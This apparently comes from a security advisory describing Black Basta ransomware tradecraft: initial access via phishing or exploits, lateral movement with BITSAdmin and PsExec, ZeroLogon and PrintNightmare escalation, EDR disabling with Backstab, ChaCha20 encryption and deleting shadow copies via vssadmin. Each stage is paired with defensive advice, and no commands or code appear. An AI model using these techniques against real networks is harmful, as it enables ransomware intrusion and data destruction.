Black Basta's approach to initial access involves spearphishing or exploiting public-facing applications, leveraging the widespread vulnerability of users to phishing emails and unpatched systems. Once inside the network, affiliates use BITSAdmin and PsExec for lateral movement, tools that are often overlooked due to their legitimate administrative uses. This underscores the importance of monitoring for unusual activity involving these tools, even if they are commonly used in IT environments.
Privilege escalation techniques involve sophisticated exploits such as ZeroLogon and PrintNightmare, which target critical vulnerabilities in Windows Active Directory domains. These exploits allow attackers to elevate privileges and move laterally within the network, highlighting the need for timely patch management and vulnerability assessment practices to mitigate such risks.
Disabling defenses is a critical step for Black Basta affiliates, who use PowerShell and the custom Backstab tool to disable antivirus and endpoint detection and response (EDR) systems. This phase emphasizes the necessity for robust security configurations and continuous monitoring of PowerShell and other scripting activities.
The final stages of their attack involve encrypting files with a custom ChaCha20 algorithm and deleting volume shadow copies using vssadmin.exe to prevent recovery. Organizations must prioritize regular backups, ensure they are kept offline, and frequently test restoration processes to mitigate the impact of such ransomware attacks.
Be immediately notified of new advisories and associated security tests